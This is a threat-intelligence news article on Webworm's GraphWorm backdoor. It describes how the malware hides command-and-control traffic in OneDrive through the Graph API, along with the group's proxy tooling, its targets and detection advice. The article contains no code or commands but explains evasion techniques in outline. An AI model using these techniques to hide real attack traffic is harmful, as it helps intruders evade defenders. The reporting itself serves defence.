A China-aligned threat group known as Webworm has deployed a sophisticated new backdoor called GraphWorm that routes all command-and-control traffic through Microsoft OneDrive, effectively hiding malicious activity within one of the world's most trusted cloud platforms. The malware, also internally referred to as OverOneDrive, uses Microsoft's Graph API to communicate exclusively through OneDrive, making its network traffic indistinguishable from normal cloud storage operations. WeLiveSecurity researchers identified the malware and shared their findings with Cyber Security News, revealing how the group has evolved beyond previously used tools like McRat and Trochilus.

Webworm has been active since at least 2017 and has significantly expanded its targeting scope. Initially focused on Asian organizations, the group now actively pursues European government bodies in Belgium, Italy, Serbia, and Poland, along with targets in South Africa. The group gains initial access using open-source reconnaissance tools including Nuclei (a vulnerability scanner) and dirsearch (a web path scanner), and has been observed exploiting a post-authentication remote code execution vulnerability in SquirrelMail to compromise exposed web applications.

GraphWorm is written in Go and creates a unique victim identifier by combining network adapter details, processor information, and device serial numbers. For each compromised machine, the backdoor establishes a dedicated OneDrive folder with three subfolders that handle file storage, command receipt, and result transmission. The malware supports uploading and downloading files, executing shell commands through cmd.exe, and adjusting sleep intervals. Command results are written to a file named beaconshelloutput.txt and uploaded back to OneDrive using Microsoft's createUploadSession API endpoint, allowing large file transfers without triggering typical security alerts.

Beyond GraphWorm, Webworm has built an extensive proxy infrastructure using both open-source and custom tools. These include Wormsrp (a modified version of the frp reverse proxy), ChainWorm (which chains multiple proxy hops), SmuxProxy (based on the iox port-forwarding tool), and WormSocket (which routes traffic through websocket connections). Researchers also discovered that the group used a compromised Amazon S3 bucket to store configuration files and exfiltrated data, including virtual machine snapshots from an Italian government entity and documents from a Spanish government body.

Security teams should implement several defensive measures to detect Webworm activity. Organizations should monitor for unusual outbound connections to cloud storage services, particularly OneDrive traffic patterns that deviate from normal user behavior. Teams should audit scheduled tasks and registry run keys for unauthorized entries, and establish monitoring for processes using cmd.exe or powershell.exe to download files from external sources. Given the group's reliance on legitimate cloud infrastructure, traditional network-based detection methods may prove insufficient, requiring organizations to implement behavioral analytics and cloud access security broker solutions to identify anomalous activity within trusted platforms.

Source: https://cybersecuritynews.com/graphworm-malware-uses-microsoft-onedrive/